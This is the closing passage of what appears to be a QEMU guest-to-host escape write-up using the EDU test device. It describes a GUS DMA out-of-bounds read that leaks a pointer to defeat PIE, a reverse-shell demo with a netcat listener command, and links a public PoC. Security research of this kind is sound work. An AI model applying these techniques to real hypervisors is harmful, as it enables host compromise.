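With count = 4096, an 8-bit channel consumes 4096 source bytes and a 16-bit channel consumes 8192, which is a full 4 KiB past the end of a 4 KiB tmpbuf.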
The leak is deterministic. GUS_read_DMA() is invoked as the i8257 DMA callback, so on entry the stack frame immediately above tmpbuf always contains the saved return address into i8257_dma_run+175 plus surrounding register spills. That gives a stable QEMU .text pointer on every run, which is enough to defeat PIE the same way the EDU read does.
This worked. We had a working PoC for it in a bare-metal guest. What killed it for the final writeup chain was the plumbing. The 16-bit ISA DMA bus is 24-bit-addressable, so we needed a guest-physical buffer below 16 MiB. Linux refuses to hand userspace ZONE_DMA (< 16 MiB) pages because those are reserved for kernel DMA. The workaround is memmap=4K$0xADDR on the kernel cmdline, which marks a 4 KiB region as "reserved" in the e820 map, then mmap('/dev/mem', ..., ADDR) to grab it. It works, but it requires a guest reboot, it requires picking an address that isn't already in use by the kernel (and bricking the guest a few times until you find one that is free), and it adds ~150 lines of i8257 and GUS programming. None of that pays off compared to "just use the EDU TO_PCI direction".
The realization is also kind of funny in retrospect. We looked at edu_dma_timer() one more time and noticed that the FROM_PCI and TO_PCI branches were structurally identical - same advisory check, same subtraction, same dma_buf + dst/src, just pci_dma_read vs pci_dma_write. We'd been planning to use one bug to leak a thing we could already leak with the bug we were planning to use for the write. So we threw GUS out and the exploit shrank by 60%.
Video PoC
Three-terminal demo - QEMU running with -device edu, the SSH session into the guest that fires the exploit, and a netcat listener that catches the reverse shell when the corrupted timer fires.
No CVE, references, credits
There's nothing to disclose. EDU is CONFIG_TEST_DEVICES-gated tutorial code, not in any production QEMU build. Upstream isn't going to patch it, and shouldn't. If you find the same anti-pattern in a real device (we have suspects from the audit, and several of them definitely live in production builds), that's a different conversation, and the disclosure path is qemu-security@nongnu.org.
Sources / references / further reading:
- hw/misc/edu.c - the device file.
- include/qemu/timer.h - the QEMUTimer definition.
- hw/audio/gus.c + hw/audio/gusemu_hal.c - the path not taken.
- VENOM (CVE-2015-3456) - the canonical example of this category, a guest-reachable heap overflow in the QEMU floppy controller that turned into host RCE.
- All public QEMU CVEs: opencve.io.
The PoC and a reproducer Docker environment live in this writeup tree at release/, and the same code mirrored to its own repo at github.com/xchglabs/Qemu-guest-to-host. Clone, follow the three-terminal workflow in the README (make run, nc -nvlp 4444, make exploit + make ssh + sudo ./pwn), watch the host fall over.
Thanks for reading.